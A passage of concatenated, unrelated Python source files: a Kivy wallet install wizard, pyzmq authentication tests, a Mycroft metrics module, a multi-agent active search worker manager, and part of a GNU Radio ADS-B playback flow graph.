return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg, on_finished=None):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
if on_finished:
Clock.schedule_once(lambda dt: on_finished(), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, **kwargs):
self.dispatch('on_wizard_complete', self.wallet)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def confirm_dialog(self, **kwargs):
WizardConfirmDialog(self, **kwargs).open()
def tos_dialog(self, **kwargs):
WizardTOSDialog(self, **kwargs).open()
def email_dialog(self, **kwargs):
WizardEmailDialog(self, **kwargs).open()
def otp_dialog(self, **kwargs):
if kwargs['otp_secret']:
WizardNewOTPDialog(self, **kwargs).open()
else:
WizardKnownOTPDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_message(self, msg): self.show_error(msg)
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
def on_success(old_pin, pin):
assert old_pin is None
run_next(pin, False)
def on_failure():
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(app, None, _('Choose PIN code'), on_success, on_failure, is_change=2)
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
test_security.py | """Test libzmq security (libzmq >= 3.3.0)"""
# -*- coding: utf8 -*-
# Copyright (C) PyZMQ Developers
# Distributed under the terms of the Modified BSD License.
import os
from threading import Thread
import zmq
from zmq.tests import (
BaseZMQTestCase, SkipTest
)
from zmq.utils import z85
USER = b"admin"
PASS = b"password"
class TestSecurity(BaseZMQTestCase):
def setUp(self):
if zmq.zmq_version_info() < (4,0):
raise SkipTest("security is new in libzmq 4.0")
try:
zmq.curve_keypair()
except zmq.ZMQError:
raise SkipTest("security requires libzmq to be linked against libsodium")
super(TestSecurity, self).setUp()
def zap_handler(self):
socket = self.context.socket(zmq.REP)
socket.bind("inproc://zeromq.zap.01")
try:
msg = self.recv_multipart(socket)
version, sequence, domain, address, identity, mechanism = msg[:6]
if mechanism == b'PLAIN':
username, password = msg[6:]
elif mechanism == b'CURVE':
key = msg[6]
self.assertEqual(version, b"1.0")
self.assertEqual(identity, b"IDENT")
reply = [version, sequence]
if mechanism == b'CURVE' or \
(mechanism == b'PLAIN' and username == USER and password == PASS) or \
(mechanism == b'NULL'):
reply.extend([
b"200",
b"OK",
b"anonymous",
b"",
])
else:
reply.extend([
b"400",
b"Invalid username or password",
b"",
b"",
])
socket.send_multipart(reply)
finally:
socket.close()
def start_zap(self):
self.zap_thread = Thread(target=self.zap_handler)
self.zap_thread.start()
def stop_zap(self):
self.zap_thread.join()
def bounce(self, server, client):
msg = [os.urandom(64), os.urandom(64)]
client.send_multipart(msg)
recvd = self.recv_multipart(server)
self.assertEqual(recvd, msg)
server.send_multipart(recvd)
msg2 = self.recv_multipart(client)
self.assertEqual(msg2, msg)
def test_null(self):
"""test NULL (default) security"""
server = self.socket(zmq.DEALER)
client = self.socket(zmq.DEALER)
self.assertEqual(client.MECHANISM, zmq.NULL)
self.assertEqual(server.mechanism, zmq.NULL)
self.assertEqual(client.plain_server, 0)
self.assertEqual(server.plain_server, 0)
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client)
def test_plain(self):
"""test PLAIN authentication"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.assertEqual(client.plain_username, b'')
self.assertEqual(client.plain_password, b'')
client.plain_username = USER
client.plain_password = PASS
self.assertEqual(client.getsockopt(zmq.PLAIN_USERNAME), USER)
self.assertEqual(client.getsockopt(zmq.PLAIN_PASSWORD), PASS)
self.assertEqual(client.plain_server, 0)
self.assertEqual(server.plain_server, 0)
server.plain_server = True
self.assertEqual(server.mechanism, zmq.PLAIN)
self.assertEqual(client.mechanism, zmq.PLAIN)
assert not client.plain_server
assert server.plain_server
self.start_zap()
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client)
self.stop_zap()
def skip_plain_inauth(self):
"""test PLAIN failed authentication"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.sockets.extend([server, client])
client.plain_username = USER
client.plain_password = b'incorrect'
server.plain_server = True
self.assertEqual(server.mechanism, zmq.PLAIN)
self.assertEqual(client.mechanism, zmq.PLAIN)
self.start_zap()
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
client.send(b'ping')
server.rcvtimeo = 250
self.assertRaisesErrno(zmq.EAGAIN, server.recv)
self.stop_zap()
def test_keypair(self):
"""test curve_keypair"""
try:
public, secret = zmq.curve_keypair()
except zmq.ZMQError:
raise SkipTest("CURVE unsupported")
self.assertEqual(type(secret), bytes)
self.assertEqual(type(public), bytes)
self.assertEqual(len(secret), 40)
self.assertEqual(len(public), 40)
# verify that it is indeed Z85
bsecret, bpublic = [ z85.decode(key) for key in (public, secret) ]
self.assertEqual(type(bsecret), bytes)
self.assertEqual(type(bpublic), bytes)
self.assertEqual(len(bsecret), 32)
self.assertEqual(len(bpublic), 32)
def test_curve(self):
"""test CURVE encryption"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.sockets.extend([server, client])
try:
server.curve_server = True
except zmq.ZMQError as e:
# will raise EINVAL if not linked against libsodium
if e.errno == zmq.EINVAL:
raise SkipTest("CURVE unsupported")
server_public, server_secret = zmq.curve_keypair()
client_public, client_secret = zmq.curve_keypair()
server.curve_secretkey = server_secret
server.curve_publickey = server_public
client.curve_serverkey = server_public
client.curve_publickey = client_public
client.curve_secretkey = client_secret
self.assertEqual(server.mechanism, zmq.CURVE)
self.assertEqual(client.mechanism, zmq.CURVE)
self.assertEqual(server.get(zmq.CURVE_SERVER), True)
self.assertEqual(client.get(zmq.CURVE_SERVER), False)
self.start_zap()
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client)
self.stop_zap()
|
__init__.py | # Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import threading
import time
from mycroft.util.log import LOG
from mycroft.util.setup_base import get_version
from copy import copy
def report_metric(name, data):
"""
Report a general metric to the Mycroft servers
Args:
name (str): Name of metric. Must use only letters and hyphens
data (dict): JSON dictionary to report. Must be valid JSON
"""
#try:
# if Configuration().get()['opt_in']:
# DeviceApi().report_metric(name, data)
#except (requests.HTTPError, requests.exceptions.ConnectionError) as e:
# LOG.error('Metric couldn\'t be uploaded, due to a network error ({})'
# .format(e))
LOG.debug("Supressed metric report: " + str(name) + str(data))
def report_timing(ident, system, timing, additional_data=None):
"""
Create standardized message for reporting timing.
ident (str): identifier of user interaction
system (str): system the that's generated the report
timing (stopwatch): Stopwatch object with recorded timing
additional_data (dict): dictionary with related data
"""
additional_data = additional_data or {}
report = copy(additional_data)
report['id'] = ident
report['system'] = system
report['start_time'] = timing.timestamp
report['time'] = timing.time
#report_metric('timing', report)
LOG.debug("Supressed timing report: " + str(report))
class Stopwatch(object):
"""
Simple time measuring class.
"""
def __init__(self):
self.timestamp = None
self.time = None
def start(self):
"""
Start a time measurement
"""
self.timestamp = time.time()
def lap(self):
cur_time = time.time()
start_time = self.timestamp
self.timestamp = cur_time
return cur_time - start_time
def stop(self):
"""
Stop a running time measurement. returns the measured time
"""
cur_time = time.time()
start_time = self.timestamp
self.time = cur_time - start_time
return self.time
def __enter__(self):
"""
Start stopwatch when entering with-block.
"""
self.start()
def __exit__(self, tpe, value, tb):
"""
Stop stopwatch when exiting with-block.
"""
self.stop()
def __str__(self):
cur_time = time.time()
if self.timestamp:
return str(self.time or cur_time - self.timestamp)
else:
return 'Not started'
class MetricsAggregator(object):
"""
MetricsAggregator is not threadsafe, and multiple clients writing the
same metric "concurrently" may result in data loss.
"""
def __init__(self):
self._counters = {}
self._timers = {}
self._levels = {}
self._attributes = {}
self.attr("version", get_version())
def increment(self, name, value=1):
cur = self._counters.get(name, 0)
self._counters[name] = cur + value
def timer(self, name, value):
cur = self._timers.get(name)
if not cur:
self._timers[name] = []
cur = self._timers[name] = []
cur.append(value)
def level(self, name, value):
self._levels[name] = value
def clear(self):
self._counters = {}
self._timers = {}
self._levels = {}
self._attributes = {}
self.attr("version", get_version())
def attr(self, name, value):
self._attributes[name] = value
def flush(self):
publisher = MetricsPublisher()
payload = {
'counters': self._counters,
'timers': self._timers,
'levels': self._levels,
'attributes': self._attributes
}
self.clear()
count = (len(payload['counters']) + len(payload['timers']) +
len(payload['levels']))
if count > 0:
LOG.debug(json.dumps(payload))
def publish():
publisher.publish(payload)
threading.Thread(target=publish).start()
class MetricsPublisher(object):
def __init__(self, url="nop", enabled=False):
# def __init__(self, url=config.get("url"), enabled=config.get("metrics")):
# self.url = url
# self.enabled = enabled
self.enabled = False
def publish(self, events):
# if 'session_id' not in events:
# session_id = SessionManager.get().session_id
# events['session_id'] = session_id
# if self.enabled:
# requests.post(
# self.url,
# headers={'Content-Type': 'application/json'},
# data=json.dumps(events), verify=False)
return
|
worker_manager.py | '''
Code for the work:
``Multi Agent Active Search using Realistic Depth-Aware Noise Model'', Ramina Ghods, William J Durkin and Jeff Schneider
(C) Ramina Ghods 2020 (rghods@cs.cmu.edu)
Please cite the following paper to use the code:
@article{ghods2020multi,
title={Multi-Agent Active Search using Realistic Depth-Aware Noise Model},
author={Ghods, Ramina and Durkin, William J and Schneider, Jeff},
journal={arXiv preprint arXiv:2011.04825},
year={2020}
}
***************************
Manager for multiple agents(workers).
(structure is referenced from parallel Thompson Sampling by:
``@inproceedings{kandasamy2018parallelised,
title={Parallelised bayesian optimisation via thompson sampling},
author={Kandasamy, Kirthevasan and Krishnamurthy, Akshay and Schneider, Jeff and P{\'o}czos, Barnab{\'a}s},
booktitle={International Conference on Artificial Intelligence and Statistics},
pages={133--142},
year={2018}
GitHub repository: {https://github.com/kirthevasank/gp-parallel-ts)}
}''
'''
import os
import shutil
import time
#from sets import Set
from multiprocessing import Process
import pickle as pkl
TIME_TOL = 1e-5
class WorkerManager(object):
def __init__(self, func_caller, worker_ids, poll_time, trialnum):
if hasattr(worker_ids, '__iter__'):
self.worker_ids = worker_ids
else:
self.worker_ids = list(range(worker_ids))
self.num_workers = len(self.worker_ids)
self.poll_time = poll_time
self.func_caller = func_caller
# These will be set in reset
self.optimiser = None
self.latest_results = None
# Reset
self.reset(trialnum)
def reset(self, trialnum):
""" Resets everything. """
self.optimiser = None
self.latest_results = [] # A list of namespaces
# Create the last receive times
self.last_receive_times = {wid:0.0 for wid in self.worker_ids}
self.result_dir_names = {wid:'./log/exp%d/result_%s'%(trialnum, str(wid)) for wid in
self.worker_ids}
# Create the working directories
self.working_dir_names = {wid:'./log/exp%d/working_%s/tmp'%(trialnum, str(wid)) for wid in
self.worker_ids}
self._result_file_name = 'result.pkl'
self._num_file_read_attempts = 100
self._file_read_poll_time = 0.5 # wait for 0.5 seconds
self._child_reset()
def _child_reset(self):
self._delete_and_create_dirs(list(self.result_dir_names.values()))
self._delete_dirs(list(self.working_dir_names.values()))
self.free_workers = set(self.worker_ids)
self.qinfos_in_progress = {wid:None for wid in self.worker_ids}
self.worker_processes = {wid:None for wid in self.worker_ids}
def set_optimiser(self, optimiser):
self.optimiser = optimiser
def _delete_dirs(self, list_of_dir_names):
""" Deletes a list of directories."""
for dir_name in list_of_dir_names:
if os.path.exists(dir_name):
shutil.rmtree(dir_name)
def _delete_and_create_dirs(self, list_of_dir_names):
""" Deletes a list of directories and creates new ones. """
for dir_name in list_of_dir_names:
if os.path.exists(dir_name):
shutil.rmtree(dir_name)
os.makedirs(dir_name)
def _get_result_file_name_for_worker(self, worker_id):
""" Computes the result file name for the worker. """
return os.path.join(self.result_dir_names[worker_id], self._result_file_name)
def _read_result_from_file(self, result_file_name):
""" Reads the result from the file name. """
#pylint: disable=bare-except
num_attempts = 0
result = 0.5
while num_attempts < self._num_file_read_attempts:
try:
# file_reader = open(result_file_name, 'r')
# read_in = float(file_reader.read().strip())
# file_reader.close()
# result = read_in
with open(result_file_name, 'rb') as f:
result = pkl.load(f)
# print("read result: ",result)
break
except:
print('Encountered error %d times when reading %s. Trying again.'%(num_attempts,result_file_name))
num_attempts += 1
time.sleep(self._file_read_poll_time)
#file_reader.close()
return result
def _read_result_from_worker_and_update(self, worker_id):
""" Reads the result from the worker. """
# print("reading result from worker: ",worker_id)
# Read the file
result_file_name = self._get_result_file_name_for_worker(worker_id)
val = self._read_result_from_file(result_file_name)
# Now update the relevant qinfo and put it to latest_results
qinfo = self.qinfos_in_progress[worker_id]
qinfo.val = val #dict of {x,y} from ThompsonActiveSearch
# if not hasattr(qinfo, 'true_val'):
# qinfo.true_val = val
qinfo.receive_time = self.optimiser.get_curr_spent_capital()
qinfo.eval_time = qinfo.receive_time - qinfo.send_time
self.latest_results.append(qinfo)
# Update receive time
self.last_receive_times[worker_id] = qinfo.receive_time
# Delete the file.
os.remove(result_file_name)
# Delete content in a working directory.
shutil.rmtree(self.working_dir_names[worker_id])
# Add the worker to the list of free workers and clear qinfos in progress.
self.worker_processes[worker_id].terminate()
self.worker_processes[worker_id] = None
self.qinfos_in_progress[worker_id] = None
self.free_workers.add(worker_id)
def fetch_latest_results(self):
""" Returns the latest results. """
ret_idxs = []
for i in range(len(self.latest_results)):
if (self.latest_results[i].receive_time <=
self.optimiser.get_curr_spent_capital()):# + TIME_TOL):
ret_idxs.append(i)
keep_idxs = [i for i in range(len(self.latest_results)) if i not in ret_idxs]
ret = [self.latest_results[i] for i in ret_idxs] #list of dicts {'x','y'} <- points returned by ThompsonActiveSearch for different agents
self.latest_results = [self.latest_results[i] for i in keep_idxs]
return ret
def close_all_jobs(self):
""" closes all jobs (TODO) """
pass
def _get_last_receive_time(self):
""" Returns the last time we received a job. """
all_receive_times = self.last_receive_times.values()
return max(all_receive_times)
def _worker_is_free(self, wid):
""" Return True if worker wid is free """
if wid in self.free_workers:
return True
worker_result_file_name = self._get_result_file_name_for_worker(wid)
if os.path.exists(worker_result_file_name):
self._read_result_from_worker_and_update(wid)
else:
return False
def a_worker_is_free(self):
""" Return wid if any worker is free """
for wid in self.worker_ids:
if self._worker_is_free(wid):
# print('worker ',wid,' is free')
return self._get_last_receive_time()
return None
def all_workers_are_free(self):
""" return True if all workers are free """
all_free = True
for wid in self.worker_ids:
all_free = (all_free and self._worker_is_free(wid))
if all_free:
return self._get_last_receive_time()
else:
return None
def _dispatch_evaluation(self, func_caller, point_dict, qinfo, worker_id, **kwargs):
""" dispatches evaluation to worker_id """
'''
args:
point_dict : dictionary {'X' : all X's searched so far, 'Y': all Y's sensed so far}
func_caller : the function ThompsonActiveSearch in file TS.py
worker_id : the agent that will perform this computation
qinfo :
'''
if self.qinfos_in_progress[worker_id] is not None:
err_msg = 'qinfos_in_progress: %s,\nfree_workers: %s.'%(
str(self.qinfos_in_progress), str(self.free_workers))
# print(err_msg)
raise ValueError('Check if worker is free before sending evaluation.')
# First add all the data to qinfo
qinfo.worker_id = worker_id
qinfo.working_dir = self.working_dir_names[worker_id]
qinfo.result_file = self._get_result_file_name_for_worker(worker_id)
qinfo.point = point_dict
# Create the working directory
os.makedirs(qinfo.working_dir)
# Dispatch the evaluation in a new process
target_func = lambda: func_caller.ActiveSearch(point_dict, qinfo)# <- calls ThompsonActiveSearch(point_dict) , qinfo, **kwargs)
# print("dispatching agent: ",worker_id)
# print("free agents: ",self.free_workers)
self.worker_processes[worker_id] = Process(target=target_func)
self.worker_processes[worker_id].start()
# Add the qinfo to the in progress bar and remove from free_workers
self.qinfos_in_progress[worker_id] = qinfo
self.free_workers.discard(worker_id)
def dispatch_single_evaluation(self, func_caller, point, qinfo, **kwargs):
""" Dispatches a single evaluation to a free worker """
wid = self.free_workers.pop()
self._dispatch_evaluation(func_caller, point, qinfo, wid, **kwargs)
def dispatch_batch_of_evaluations(self, func_caller, points, qinfos, **kwargs):
""" Dispatches a batch of evaluations; number of evaluation points == number of workers available in total"""
# assert len(points['X']) == self.num_workers
# assert len(points['Y']) == self.num_workers
assert (len(points['X'])%self.num_workers) == 0
for wid in range(self.num_workers):
self._dispatch_evaluation(func_caller, points, qinfos[wid], self.worker_ids[wid], **kwargs)
|
kerberos_sigmf_playback4.py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
##################################################
# GNU Radio Python Flow Graph
# Title: Kerberos Sigmf Playback4
# GNU Radio version: 3.7.13.4
##################################################
if __name__ == '__main__':
import ctypes
import sys
if sys.platform.startswith('linux'):
try:
x11 = ctypes.cdll.LoadLibrary('libX11.so')
x11.XInitThreads()
except:
print "Warning: failed to XInitThreads()"
from PyQt4 import Qt
from PyQt4.QtCore import QObject, pyqtSlot
from gnuradio import analog
from gnuradio import blocks
from gnuradio import eng_notation
from gnuradio import fft
from gnuradio import filter
from gnuradio import gr
from gnuradio import qtgui
from gnuradio.eng_option import eng_option
from gnuradio.fft import window
from gnuradio.filter import firdes
from optparse import OptionParser
import adsb
import gr_sigmf
import math
import pyqt
import sip
import sys
import threading
import time
from gnuradio import qtgui
class kerberos_sigmf_playback4(gr.top_block, Qt.QWidget):
def __init__(self):
gr.top_block.__init__(self, "Kerberos Sigmf Playback4")
Qt.QWidget.__init__(self)
self.setWindowTitle("Kerberos Sigmf Playback4")
qtgui.util.check_set_qss()
try:
self.setWindowIcon(Qt.QIcon.fromTheme('gnuradio-grc'))
except:
pass
self.top_scroll_layout = Qt.QVBoxLayout()
self.setLayout(self.top_scroll_layout)
self.top_scroll = Qt.QScrollArea()
self.top_scroll.setFrameStyle(Qt.QFrame.NoFrame)
self.top_scroll_layout.addWidget(self.top_scroll)
self.top_scroll.setWidgetResizable(True)
self.top_widget = Qt.QWidget()
self.top_scroll.setWidget(self.top_widget)
self.top_layout = Qt.QVBoxLayout(self.top_widget)
self.top_grid_layout = Qt.QGridLayout()
self.top_layout.addLayout(self.top_grid_layout)
self.settings = Qt.QSettings("GNU Radio", "kerberos_sigmf_playback4")
self.restoreGeometry(self.settings.value("geometry").toByteArray())
##################################################
# Variables
##################################################
self.function_probe_0_3 = function_probe_0_3 = 0
self.function_probe_0_2 = function_probe_0_2 = 0
self.function_probe_0_1 = function_probe_0_1 = 0
self.trig_delay = trig_delay = 0.001
self.trig_channel = trig_channel = 0
self.throttle = throttle = 10
self.thresh_phase = thresh_phase = 10
self.thresh_comp = thresh_comp = 10
self.thresh = thresh = 50
self.samp_rate = samp_rate = 2e6
self.samp_offset_0_3 = samp_offset_0_3 = function_probe_0_3
self.samp_offset_0_2 = samp_offset_0_2 = function_probe_0_2
self.samp_offset_0_1 = samp_offset_0_1 = function_probe_0_1
self.nfft = nfft = 8192
self.manual_fine_delay_3 = manual_fine_delay_3 = 0
self.manual_fine_delay_2 = manual_fine_delay_2 = 0
self.manual_fine_delay_1 = manual_fine_delay_1 = 0
self.manual_fine_delay_0 = manual_fine_delay_0 = 0
self.delay_3 = delay_3 = 1788
self.delay_2 = delay_2 = 5261
self.delay_1 = delay_1 = 734
self.delay_0 = delay_0 = 0
self.corr_alpha_0_3 = corr_alpha_0_3 = 0.01
self.corr_alpha_0_2 = corr_alpha_0_2 = 0.01
self.corr_alpha_0_1 = corr_alpha_0_1 = 0.01
##################################################
# Blocks
##################################################
self.probe_offset_0_3 = blocks.probe_signal_f()
self.probe_offset_0_2 = blocks.probe_signal_f()
self.probe_offset_0_1 = blocks.probe_signal_f()
self.main_tab = Qt.QTabWidget()
self.main_tab_widget_0 = Qt.QWidget()
self.main_tab_layout_0 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_0)
self.main_tab_grid_layout_0 = Qt.QGridLayout()
self.main_tab_layout_0.addLayout(self.main_tab_grid_layout_0)
self.main_tab.addTab(self.main_tab_widget_0, 'Channel')
self.main_tab_widget_1 = Qt.QWidget()
self.main_tab_layout_1 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_1)
self.main_tab_grid_layout_1 = Qt.QGridLayout()
self.main_tab_layout_1.addLayout(self.main_tab_grid_layout_1)
self.main_tab.addTab(self.main_tab_widget_1, 'Coarse Adjust')
self.main_tab_widget_2 = Qt.QWidget()
self.main_tab_layout_2 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_2)
self.main_tab_grid_layout_2 = Qt.QGridLayout()
self.main_tab_layout_2.addLayout(self.main_tab_grid_layout_2)
self.main_tab.addTab(self.main_tab_widget_2, 'Correlate')
self.main_tab_widget_3 = Qt.QWidget()
self.main_tab_layout_3 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_3)
self.main_tab_grid_layout_3 = Qt.QGridLayout()
self.main_tab_layout_3.addLayout(self.main_tab_grid_layout_3)
self.main_tab.addTab(self.main_tab_widget_3, 'Single Decode')
self.main_tab_widget_4 = Qt.QWidget()
self.main_tab_layout_4 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_4)
self.main_tab_grid_layout_4 = Qt.QGridLayout()
self.main_tab_layout_4.addLayout(self.main_tab_grid_layout_4)
self.main_tab.addTab(self.main_tab_widget_4, 'Sum and Decode')
self.main_tab_widget_5 = Qt.QWidget()
self.main_tab_layout_5 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_5)
self.main_tab_grid_layout_5 = Qt.QGridLayout()
self.main_tab_layout_5.addLayout(self.main_tab_grid_layout_5)
self.main_tab.addTab(self.main_tab_widget_5, 'Phase Analysis')
self.top_grid_layout.addWidget(self.main_tab, 0, 0, 1, 2)
for r in range(0, 1):
self.top_grid_layout.setRowStretch(r, 1)
for c in range(0, 2):
self.top_grid_layout.setColumnStretch(c, 1)
self._trig_delay_tool_bar = Qt.QToolBar(self)
self._trig_delay_tool_bar.addWidget(Qt.QLabel("trig_delay"+": "))
self._trig_delay_line_edit = Qt.QLineEdit(str(self.trig_delay))
self._trig_delay_tool_bar.addWidget(self._trig_delay_line_edit)
self._trig_delay_line_edit.returnPressed.connect(
lambda: self.set_trig_delay(eng_notation.str_to_num(str(self._trig_delay_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._trig_delay_tool_bar, 2, 1, 1, 1)
for r in range(2, 3):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._trig_channel_options = (0, 1, 2, 3, )
self._trig_channel_labels = ('chan0', 'chan1', 'chan2', 'chan3', )
self._trig_channel_tool_bar = Qt.QToolBar(self)
self._trig_channel_tool_bar.addWidget(Qt.QLabel("trig_channel"+": "))
self._trig_channel_combo_box = Qt.QComboBox()
self._trig_channel_tool_bar.addWidget(self._trig_channel_combo_box)
for label in self._trig_channel_labels: self._trig_channel_combo_box.addItem(label)
self._trig_channel_callback = lambda i: Qt.QMetaObject.invokeMethod(self._trig_channel_combo_box, "setCurrentIndex", Qt.Q_ARG("int", self._trig_channel_options.index(i)))
self._trig_channel_callback(self.trig_channel)
self._trig_channel_combo_box.currentIndexChanged.connect(
lambda i: self.set_trig_channel(self._trig_channel_options[i]))
self.main_tab_grid_layout_1.addWidget(self._trig_channel_tool_bar, 2, 0, 1, 1)
for r in range(2, 3):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._throttle_tool_bar = Qt.QToolBar(self)
self._throttle_tool_bar.addWidget(Qt.QLabel('Throttle'+": "))
self._throttle_line_edit = Qt.QLineEdit(str(self.throttle))
self._throttle_tool_bar.addWidget(self._throttle_line_edit)
self._throttle_line_edit.returnPressed.connect(
lambda: self.set_throttle(eng_notation.str_to_num(str(self._throttle_line_edit.text().toAscii()))))
self.top_grid_layout.addWidget(self._throttle_tool_bar, 9, 1, 1, 1)
for r in range(9, 10):
self.top_grid_layout.setRowStretch(r, 1)
for c in range(1, 2):
self.top_grid_layout.setColumnStretch(c, 1)
self._thresh_phase_tool_bar = Qt.QToolBar(self)
self._thresh_phase_tool_bar.addWidget(Qt.QLabel('Complex Threshold'+": "))
self._thresh_phase_line_edit = Qt.QLineEdit(str(self.thresh_phase))
self._thresh_phase_tool_bar.addWidget(self._thresh_phase_line_edit)
self._thresh_phase_line_edit.returnPressed.connect(
lambda: self.set_thresh_phase(eng_notation.str_to_num(str(self._thresh_phase_line_edit.text().toAscii()))))
self.main_tab_grid_layout_5.addWidget(self._thresh_phase_tool_bar, 5, 0, 1, 1)
for r in range(5, 6):
self.main_tab_grid_layout_5.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_5.setColumnStretch(c, 1)
self._thresh_comp_tool_bar = Qt.QToolBar(self)
self._thresh_comp_tool_bar.addWidget(Qt.QLabel('Complex Threshold'+": "))
self._thresh_comp_line_edit = Qt.QLineEdit(str(self.thresh_comp))
self._thresh_comp_tool_bar.addWidget(self._thresh_comp_line_edit)
self._thresh_comp_line_edit.returnPressed.connect(
lambda: self.set_thresh_comp(eng_notation.str_to_num(str(self._thresh_comp_line_edit.text().toAscii()))))
self.main_tab_grid_layout_4.addWidget(self._thresh_comp_tool_bar, 8, 0, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self._thresh_tool_bar = Qt.QToolBar(self)
self._thresh_tool_bar.addWidget(Qt.QLabel('GUI Threshold'+": "))
self._thresh_line_edit = Qt.QLineEdit(str(self.thresh))
self._thresh_tool_bar.addWidget(self._thresh_line_edit)
self._thresh_line_edit.returnPressed.connect(
lambda: self.set_thresh(eng_notation.str_to_num(str(self._thresh_line_edit.text().toAscii()))))
self.top_grid_layout.addWidget(self._thresh_tool_bar, 9, 0, 1, 1)
for r in range(9, 10):
self.top_grid_layout.setRowStretch(r, 1)
for c in range(0, 1):
self.top_grid_layout.setColumnStretch(c, 1)
self._manual_fine_delay_3_tool_bar = Qt.QToolBar(self)
self._manual_fine_delay_3_tool_bar.addWidget(Qt.QLabel("manual_fine_delay_3"+": "))
self._manual_fine_delay_3_line_edit = Qt.QLineEdit(str(self.manual_fine_delay_3))
self._manual_fine_delay_3_tool_bar.addWidget(self._manual_fine_delay_3_line_edit)
self._manual_fine_delay_3_line_edit.returnPressed.connect(
lambda: self.set_manual_fine_delay_3(int(str(self._manual_fine_delay_3_line_edit.text().toAscii()))))
self.main_tab_grid_layout_4.addWidget(self._manual_fine_delay_3_tool_bar, 8, 1, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self._manual_fine_delay_2_tool_bar = Qt.QToolBar(self)
self._manual_fine_delay_2_tool_bar.addWidget(Qt.QLabel("manual_fine_delay_2"+": "))
self._manual_fine_delay_2_line_edit = Qt.QLineEdit(str(self.manual_fine_delay_2))
self._manual_fine_delay_2_tool_bar.addWidget(self._manual_fine_delay_2_line_edit)
self._manual_fine_delay_2_line_edit.returnPressed.connect(
lambda: self.set_manual_fine_delay_2(int(str(self._manual_fine_delay_2_line_edit.text().toAscii()))))
self.main_tab_grid_layout_4.addWidget(self._manual_fine_delay_2_tool_bar, 7, 1, 1, 1)
for r in range(7, 8):
